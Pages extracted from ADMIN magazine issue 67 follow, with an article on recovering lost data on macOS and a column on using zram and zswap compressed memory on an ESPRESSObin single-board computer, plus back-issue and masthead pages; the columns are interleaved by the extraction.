Before I go into detail about the individual disk (e.g., with Clonezilla [1]) before least two Library folders: the system
methods for dealing with recovering data starting data recovery measures. After Library folder at the root level of your
on macOS, note that in System Preferences booting the Mac, the system can cre- hard drive and the user Library folder
| Security & Privacy under the General tab, ate an image of the disk; only then under each user account on the sys-
the Allow apps download from option usu- does it make sense to try to recover tem. The instructions here access the
Lead Image © Sgursozlu, Fotolia.com

ally should have only the App Store item the data with data recovery tools. user folder. After that, search for the
selected. However, you will not be able to desired files in this folder. macOS also
use some of the tools presented here if this displays the Library folder when you
is the case. To install these programs, you
Restore Data with On-Board
hold down the Option key and click
can enable App Store and identified develop- Tools Go in the Finder menu. This is where
ers now, and then change the settings back Like Windows, macOS has a recycle you will find numerous files that can
when you’re done.
(Trash) bin from which users can possibly help with file recovery.

90 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Rescuing macOS Data N U TS A N D B O LTS

alternative product is EaseUS Data

Recovery Wizard for Mac [5], which
can also search for recoverable files
in the free version and then recover
them with the commercial variant
(~$90/month or $170 lifetime).
For both tools to work properly, you
need to allow access to the disks in
System Preferences | Security & Pri-
vacy. Click on the Privacy tab and
scroll down the left pane to the bot-
tom, where you can choose Full Disk
Access. You’ll have to click the lock to
make changes; then, you can click the
Plus symbol under the right window
and add the application. After that,
the tools can scan your disks.
If these two tools do not help you, the
professional Recoverit [6] is a good
alternative. Here, too, you can test
free of charge whether deleted files
can be recovered. If this works, you
Figure 1: macOS can sync data to iCloud for recovery of lost files. can also recover Microsoft Office doc-
uments with the commercial version.
To search for hidden files in the ter- Recovering Files with Tools The Free Mac Any Data Recovery
minal, you can configure macOS to software [7] offers a wizard to help
show hidden files there: If the machine has neither a Time you recover accidentally deleted files,
Machine backup nor an iCloud syn- even if they are no longer available
defaults write com.apple.Finder U chronization and the documents are in the Trash bin. After starting the
AppleShowAllFiles true also no longer available in the Trash, tool, you can select which data you
killall Finder you have to rely on additional tools. want to revive and where it should
One well-known example is Disk be placed. However, the tool requires
The false option lets you switch off Drill [4]. However, the free version some Mac experience, because you
the display again. On external data is limited and can only display files need to disable the System Integrity
media, the Trash bin can be found as that can be recovered. For just under Protection feature in macOS. To do
the .Trashes folder, where you might $90 you can acquire the Pro ver- this, start the computer in the built-
find further files that you can restore sion, which lets you recover data. An in recovery mode with the Cmd+R
with the terminal.
Time Machine is available in macOS
as a general data backup tool. The
service can regularly and automati-
cally back up entire volumes on Mac
computers (Figure 2). Either exter-
nal hard drives or network devices
that support Time Machine serve
as backup targets. Most network at-
tached storage (NAS) devices can
easily be linked to the backup soft-
ware [2]. The TimeMachineEditor
software [3] puts you in control of
the various backups and schedules.
The tool uses the basic Time Ma-
chine settings and does not need to
run 24/7. Once you have adjusted
the settings for Time Machine to
your requirements, you can exit
TimeMachineEditor. Figure 2: Time Machine is a good choice for use as a macOS data backup tool.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 91
N U TS A N D B O LTS Rescuing macOS Data

keyboard shortcut . In the recovery Double-clicking the file will open the --volume /Volumes/<my Volume>/ U
environment terminal, turn off the Terminal and wait for you to enter your --nointeraction
function and check the status with: password; otherwise, you can run the sudo /Applications/U
program with sudo in the terminal. Install\ macOS\ Big\ Sur.app/U
csrutil disable Once the tool is running, select the Contents/Resources/createinstallmedia U
csrutil status hard drive and the type of partition --volume /Volumes/USB/ U
table from which you want to recover --nointeraction
After that, restart the Mac and you data.
can use Free Mac Any Data Recovery If the macOS installation does not
(Figure 3). If the tool does not find Creating a Bootable USB work properly during a restore, you
data during the first scan, you can can restart the Mac by holding down
start an extended deep scan, which
Stick the power button for 10 seconds. At
can take some time. The lower area A bootable USB stick is helpful to this point, it is important that you
shows the volume of data the system ensure that no data needs to be down- unplug all external devices from the
has found. loaded off the web when reinstalling Mac, if possible. Alternatively, reset
Once your work is done, you will macOS and the installation is per- the System Management Controller
want to re-enable the System Integrity formed locally. As a bonus, this tool is (SMC) [9], which especially helps
Protection feature with also good for data recovery, because it with driver problems. Resetting the
lets you recover data, even without a parameter RAM and the non-volatile
csrutil enable working Internet connection. The USB RAM (NVRAM) can also help with
stick should have a capacity of at least problems [9].
If the built-in recovery operating 16GB. To start, delete the original data
system does not start, you can also from the stick with Disk Utility. As the Avoiding Data Loss with
download the required program format, use Mac OS Extended (Jour-
from the web by starting the Mac naled) and the scheme GUID Partition
More Security
in Internet recovery mode with the Table. Choose a name, (e.g., USB). You To prevent data loss on a Mac, espe-
Cmd+Alt+R keyboard shortcut. will need this name when you create cially if it is used in a home office or on
The last tool for data recovery I the stick in Terminal: the road, it is a good idea to look at the
would like to introduce is PhotoRec various firewall options. Although the
[8]. It does not require any instal- sudo /Applications/U operating system has a built-in firewall,
lation and starts from a USB stick. Install\ macOS\ Big\ Sur.app/U attackers can work around it easily
Working with the tool is a bit more Contents/Resources/createinstallmedia U with additional tools. The first thing
complicated than
with the others,
but PhotoRec can
often recover files
where other pro-
grams fail.
To begin, unpack
the download ar-
chive and launch
PhotoRec. macOS
blocks the program
run by default,
because the tool
does not come
from a verified
developer. There-
fore, you need to
approve execution
in System Prefer-
ences | Security
& Privacy under
the General tab.
PhotoRec needs to
run with root privi- Figure 3: Data recovery with Free Mac Any Data Recovery is a tad more complicated than with comparable tools;
leges in macOS. however, it rewards the user with superior results.

92 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Rescuing macOS Data N U TS A N D B O LTS

you should do is check System Prefer- After installing LuLu, you can specify Info
ences | Security & Privacy | Firewall which Apple applications you want [1] Clonezilla: [https://clonezilla.org]
to see whether the firewall is active, the firewall to allow automatically. You [2] Restoring files with Time Machine and
which is not the case after installing can also automatically approve the Spotlight:
macOS 11. To enable the firewall, click internal macOS applications and block [https://support.apple.com/guide/
on the lock icon, enter your Apple ID, only external programs. The settings mac-help/recover-files-time-machine-
and start protection by clicking the are in the Preferences option under the spotlight-mh15136/mac]
Turn On Firewall button, which will Shield in the menubar. For each pro- [3] TimeMachineEditor:
make advanced security options avail- gram that tries to establish an Internet [https://tclementdev.com/
able from the Firewall Options button. connection, a window appears that timemachineeditor/]
An external tool is necessary to keep displays the details, where you can de- [4] Disk Drill: [https://www.cleverfiles.com]
a general overview of the programs fine whether the respective application [5] EaseUS Data Recovery Wizard for Mac:
that open Internet connections. Al- is allowed to communicate externally. [https://www.easeus.com/mac/mac-data-
though the macOS built-in firewall Allow permits the data traffic, whereas recovery/]
blocks incoming connections, it does Block prevents it. If you want to allow [6] Recoverit:
not give you control over outgoing only temporary access, then use the [https://recoverit.wondershare.com/data-
traffic. The open source LuLu [10] temporarily option. LuLu has a rules recovery-mac.html]
firewall allows more control. menu item that lets you call up the [7] Free Mac Any Data Recovery:
firewall rules to configure access or [https://mac-data-recovery.com/
Clean Up and Optimize macOS delete rules. If the application tries to free-mac-any-data-recovery.html]
The free AppCleaner [11] software lets you access the Internet again, LuLu dis- [8] PhotoRec: [https://www.cgsecurity.org]
remove apps and associated files that are plays a window, and you can decide [9] Reset SMC, PRAM, and NVRAM:
no longer needed. The tool searches for whether to allow or block. [https://www.macworld.com/article/
these files stored on the system and deletes 224955/how-to-reset-a-macs-nvram-
them. Documents you have created with the
apps being interrogated are, of course, not
Conclusions pram-and-smc.html]
[10] LuLu: [https://objective-see.com/
affected by this procedure. The tool on a To avoid data loss from the outset, products/lulu.html]
macOS 12 system reliably found all linked di- it makes sense to start with system [11] AppCleaner:
rectories and folders in my tests. You do not security and keep an eye on the fire- [https://freemacsoft.net/appcleaner/]
have to perform the deletion process with wall and outbound network traffic. If
the tool itself, but you can search for the a mishap does happen, the tools and
files and directories in the Finder and delete on-board resources presented here The Author
the associated files and directories yourself. can help you recover data, which is Thomas Joos is a freelance IT consultant and
In this way, you can free up storage space easiest if a data backup with Time has been working in IT for more than 20 years.
and optimize the system at the same time. Machine has been implemented. See In addition, he writes hands-on books and
You can also avoid data loss with the tool, also the “Clean Up and Optimize papers on Windows and other Microsoft topics.
because it removes programs you no longer
macOS” box for a way to keep your Online you can meet him on [http://thomasjoos.
need in a controlled way.
filesystem orderly. Q spaces.live.com].

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 93
N U TS A N D B O LTS Performance Tuning Dojo

Stretching devices with limited resources

Fewer
Memories
Compressed memory solutions for small memory
problems. By Federico Lucifredi

Small embedded devices running Test Bench provided and the USB interface for
Linux often face a trade-off between serial access.
limited resources in CPU and RAM I am going to discuss a specific On the client side, I employ the
and the abysmal write performance board for this column to try out the handy Serial [3] Mac program, which
of SD card storage with abundant theories in practice. I will be us- includes userspace implementations
capacity. The first rule, as I dis- ing a Marvell ESPRESSObin [2] v7 of driver stacks for the two common
cussed back in 2018 [1] is to make (Figure 1), a low-cost, low-power USB-to-serial chipsets, eliminating
exclusive use of high-quality SD board made by Globalscale Tech- the hassle of installing or updating
cards for boot devices – a class 10 nologies. The ESPRESSObin was one drivers on multiple computers (and
device or better for starters – with a of the earliest single-board comput- the reboots that go with those Mach
reputable brand name printed on it. ers (SBCs) to sport a 64-bit ARM kernel modules). The connection runs
(I recommend SanDisk or Samsung CPU and remains remarkable today at 115,200 baud, with no flow control
SD cards.) Lower quality SD cards for its inclusion of a SATA port and and no parity.
simply cannot satisfy the write PCI expansion. The full spec of the The board bootstraps with U-Boot [4],
pressure of system boot or other board is interesting in its own right and from there it loads the operating
peak logging moments of operation, (Table 1), but
and while suitable for data, they here I will focus Table 1: ESPRESSObin Technical Specs
cannot be used as boot devices. on the setup for SOC Marvell Armada 3700LP (88F3720) ARM Cortex
These are the basic table stakes, but my tests. I use A53 processor
this being Linux, you can of course the external 12V Dual core up to 1.2GHz
optimize further! power supply System memory 2GB DDR4 (1GB models also ship)
Storage 1x SATA interface
1x micro SD card slot
Footprint for optional 4GB eMMC (not populated)
Network 1x Topaz networking switch
2x GbE LAN
1x Ethernet WAN
1x MiniPCIe slot
USB 1x USB 3.0
1x USB 2.0
1x micro-USB port
Expansion 2x 46-pin GPIO headers for I2C, GPIOs, PWM,
Lead Image © Lucy Baldwin, 123RF.com

UART, SPI, MMC

Misc Reset button
JTAG interface
Power supply 12V DC jack
5V via micro-USB port
Figure 1: ESPRESSObin v7 SBC shown in the 2GB of RAM and no
Power consumption Less than 1W thermal design power (TDP) at 1GHz
embedded MultiMediaCard (eMMC) variety.

94 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Performance Tuning Dojo N U TS A N D B O LTS

Figure 2: Armbian bootup screen on ESPRESSObin v7 right after Figure 3: Three zram partitions were found in my system: two for
login. Linux swap and one for logs.

system. Because the board was first core, as seen in Figure 3. The in- compromises are more likely. Either
released in 2017, the natural places crease in CPU load is counterbalanced way, the free [10] command provides
to build current OS images are the by the availability of more memory, a simple avenue to check swap use
Yocto project [5] and Armbian [6], a as existing RAM is stretched with the (Listing 1). Currently the system de-
community-managed distribution that use of compression. scribed is not using swap.
builds board-specific images of Ubuntu Starting with kernel 4.14, zram can
and Debian. I chose to use the stable be configured as a write-back cache Setup
Armbian build of Debian Stretch for committing data to permanent storage
the ESPRESSObin, and the results are in the background. Until then, this Zswap is easily configured by passing
shown in Figure 2. was commonly accomplished with the parameter zswap.enabled=1 to the
zswap [9], a lightweight memory kernel at boot in GRUB configuration
The Right Trade-off page compres-
sion driver Listing 1: Checking Swap
On systems with lots of storage and that operates root@espressobin:~# free
not enough RAM, one is naturally exclusively as a total used free shared buff/cache available
inclined to think about turning some writeback cache Mem: 2046088 82796 1834332 5548 128960 1891416
of the permanent storage into swap for swap. Swap: 1023040 0 1023040
root@espressobin:~#
space [7]. Unfortunately, the low
write performance of SD card storage Swap Usage
precludes this avenue to most embed- Listing 2: Initializing Zram the Hard Way
ded SBCs. The sensible strategy here Some important # Aligning versions between kernel and modules referenced by virtual package
is to turn some of the RAM into a workloads, $ sudo apt update; sudo apt upgrade
write-friendly device and to stretch most notably $ sudo apt install -y linux-image-extra-virtual
the amount of RAM allocated with Kubernetes, are # Create half a gigabyte ZRAM device at next available device file
the use of inline data compression for openly averse $ zramctl --find --size=512M
that partition. to swap, prefer- /dev/zram0
$ zramctl
I chose Armbian partly because it is a ring to address
NAME ALGORITHM DISKSIZE DATA COMPR TOTAL STREAMS MOUNTPOINT
distribution that turns to this strategy resource limits
/dev/zram0 lzo-rle 512M 0B 0B 0B 2
by default. Figure 3 shows Armbian early rather
# Make the ZRAM block device into a swap partition
using a zram [8] device to store /var/ than accept $ sudo mkswap /dev/zram0
log, offloading the primary source of performance Setting up swapspace version 1, size = 512 MiB (536866816 bytes)
boot-time writes from the physical degradation and no label, UUID=0818f196-4e38-43be-88ad-de6b45f50ce5
device to a 50MB RAM drive. inconsistency. # Turn the swap partition on
Zram, introduced by kernel 3.14 and At the edge or $ Swapon /dev/zram0
considered stable, creates a block in the Inter- $ zramctl
device in RAM and compresses writes net of Things NAME ALGORITHM DISKSIZE DATA COMPR TOTAL STREAMS MOUNTPOINT
to it on the fly. Default zram configu- (IOT), you have /dev/zram0 lzo-rle 512M 4K 73B 12K 2 [SWAP]
# Cleanup procedure (destroy the ZRAM setup)
rations on Debian and Ubuntu (con- to work with
$ sudo swapoff /dev/zram0
trolled by the zram-config package) the hardware
$ sudo zramctl --reset /dev/zram0
also create one swap device per CPU you have and

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 95
 N U TS A N D B O LTS Performance Tuning Dojo

options. Zram is more complicated, to mount a second device as a RAM [2] Marvell ESPRESSObin v7: [http://wiki.
and not nearly as well documented drive for /var/logs. Q espressobin.net/tiki-index.php]
as one would expect in most distribu- [3] Serial 2.12 for Macintosh: [https://www.
tions. Listing 2 shows how to set up decisivetactics.com/products/serial/]
two swap devices (and how to initial- Info [4] Das U-Boot – the Universal Boot Loader:
ize and tear down the first one) with [1] “Assess USB performance while exploring [https://www.denx.de/wiki/U-Boot]
exclusively manual steps on Ubuntu storage caching” by Federico Lucifredi, [5] Yocto Project:
Server 20.04 LTS. Listing 3 makes use ADMIN, issue 48, 2018, pg. 94, [https://www.yoctoproject.org]
of the zram-config package found in [https://www.admin-magazine.com/ [6] Armbian – Linux for ARM development
Ubuntu (again, Server version 20.04 Archive/2018/48/Assess-USB-performance- boards: [https://www.armbian.com/
LTS) to automate part of the process while-exploring-storage-caching] espressobin/]
[7] “Swap tricks” by Federico Lucifredi, AD-
Listing 3: Initializing Zram the Easy Way MIN, issue 9, 2012, pg. 83
# install Ubuntu's ZRAM management package [8] Kernel docs for zram: [https://www.
$ sudo apt install zram-config kernel.org/doc/html/latest/admin-guide/
# start the service blockdev/zram.html]
$ sudo systemctl start zram-config [9] Kernel docs for zswap:
$ zramctl [https://www.kernel.org/doc/html/latest/
NAME ALGORITHM DISKSIZE DATA COMPR TOTAL STREAMS MOUNTPOINT admin-guide/mm/zswap.html]
/dev/zram1 lzo-rle 495.8M 4K 73B 12K 2 [SWAP] [10] free(1) man page:
# Now let's make a ramdrive for /var/logs [https://linux.die.net/man/1/free]
$ zramctl --find --size=512M
/dev/zram0 The Author
# lay a filesystem on the ramdrive
Federico Lucifredi (@0xf2) is the Product Manage-
$ sudo mkfs.ext2 -q /dev/zram0
ment Director for Ceph Storage at Red Hat, formerly
# mount the ramdrive
the Ubuntu Server Product Manager at Canonical,
$ sudo mount /dev/zram0 /var/log
and the Linux “Systems Management Czar” at
$ zramctl
SUSE. He enjoys arcane hardware issues and shell-
NAME ALGORITHM DISKSIZE DATA COMPR TOTAL STREAMS MOUNTPOINT
scripting mysteries and takes his McFlurry shaken,
/dev/zram0 lzo-rle 512M 208K 3.1K 48K 2 /var/log
not stirred. You can read more from him in the
/dev/zram1 lzo-rle 495.8M 4K 73B 12K 2 [SWAP]
O’Reilly title AWS System Administration.

96 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Back Issues S E RV I C E

ADMIN Network & Security

NEWSSTAND Order online:

bit.ly/ADMIN-Newsstand

ADMIN is your source for technical solutions to real-world problems. Every issue is packed with practical
articles on the topics you need, such as: security, cloud computing, DevOps, HPC, storage, and more!
Explore our full catalog of back issues for specific topics or to complete your collection.

#66/November/December 2021
Incident Analysis
We look at updating, patching, and log monitoring container apps
and explore The Hive + Cortex optimization.
On the DVD: Ubuntu 21.10 “Impish Indri” Server Edition

#65/September/October 2021
7 Email Clients
The features in this issue tackle digital certificates, email clients,
and HP backup strategies.
On the DVD: Complete ADMIN Archive DVD

#64/July/August 2021
Bare Metal Deployment
Setting up, automating, and managing bare metal deployments gets
easier with the tools presented in this issue.
On the DVD: Rocky Linux 8.4 (Minimal Install)

#63/May/June 2021
Automation
This issue we are all about automation and configuration with
some tools to lighten your load.
On the DVD: Ubuntu 21.04 Server

#62/March/April 2021
Lean Web Servers
In this issue, we present a variety of solutions that resolve common
web server needs.
On the DVD: Fedora 33

#61/January/February 2021
Secure Containers
Security is the watchword this issue, and we begin with eliminating
container security concerns.

On the DVD: Clonezilla Live 2.7.0

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 97
S E RV I C E Contact Info / Authors

WRITE FOR US
Admin: Network and Security is looking • unheralded open source utilities
for good, practical articles on system ad- • Windows networking techniques that
ministration topics. We love to hear from aren’t explained (or aren’t explained
IT professionals who have discovered well) in the standard documentation.
innovative tools or techniques for solving We need concrete, fully developed solu-
real-world problems. tions: installation steps, configuration
Tell us about your favorite: files, examples – we are looking for a
• interoperability solutions complete discussion, not just a “hot tip”
• practical tools for cloud environments that leaves the details to the reader.
• security problems and how you solved If you have an idea for an article, send
them a 1-2 paragraph proposal describing your
• ingenious custom scripts topic to: [email protected].

Contact Info
Editor in Chief While every care has been taken in the content of
Joe Casad, [email protected] the magazine, the publishers cannot be held re-
Managing Editors sponsible for the accuracy of the information con-
Rita L Sooby, [email protected] tained within it or any consequences arising from
Lori White, [email protected] the use of it. The use of the DVD provided with the
Senior Editor magazine or any material provided on it is at your
Ken Hess own risk.
Authors Copyright and Trademarks © 2022 Linux New
Localization & Translation
Thomas Bär 30 Ian Travis Media USA, LLC.
News Editor No material may be reproduced in any form
Günter Baumgar 52
Jack Wallen whatsoever in whole or in part without the writ-
Jens-Christoph Brendel 16, 26 Copy Editors ten permission of the publishers. It is assumed
Amy Pettle, Aubrey Vaughn that all correspondence sent, for example, let-
Chris Dock 34 ters, email, faxes, photographs, articles, draw-
Layout
Marco Föllmer 78 Dena Friesen, Lori White ings, are supplied for publication or license to
third parties on a non-exclusive worldwide
Rainer W. Gerling 43 Cover Design
basis by Linux New Media unless otherwise
Dena Friesen, Illustration based on graphics by
Marc Grote 74 stated in writing.
vska, 123RF.com
All brand or product names are trademarks
Ken Hess 3 Advertising
Brian Osborn, [email protected] of their respective owners. Contact us if we
Thomas Joos 70, 90 phone +49 8093 7679420 haven’t credited your copyright; we will always
correct any oversight.
Jeff Layton 46 Publisher
Brian Osborn Printed in Nuremberg, Germany by hofmann
Rubén Llorente 64 infocom GmbH.
Marketing Communications
Martin Loschwitz 10, 20, 80 Gwen Clark, [email protected] Distributed by Seymour Distribution Ltd, United
Linux New Media USA, LLC Kingdom
Federico Lucifredi 94 4840 Bob Billings Parkway, Ste 104 ADMIN (ISSN 2045-0702) is published bimonthly
Lawrence, KS 66049 USA
Dr. Holger Reibold 40 by Linux New Media USA, LLC, 4840 Bob Billings
Customer Service / Subscription Parkway, Ste 104, Lawrence, KS 66049, USA.
Thorsten Scherf 88 January/February 2022. Periodicals Postage paid
For USA and Canada:
Frank-Michael Schlede 30 Email: [email protected] at Lawrence, KS. Ride-Along Enclosed.
Phone: 1-866-247-2802 POSTMASTER: Please send address changes to
Jens-Henrik Söldner 58 (Toll Free from the US and Canada) ADMIN, 4840 Bob Billings Parkway, Ste 104,
Jack Wallen 8 For all other countries: Lawrence, KS 66049, USA.
Email: [email protected] Published in Europe by: Sparkhaus Media GmbH,
Matthias Wübbeling 62, 86 www.admin-magazine.com Bialasstr. 1a, 85625 Glonn, Germany.

98 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M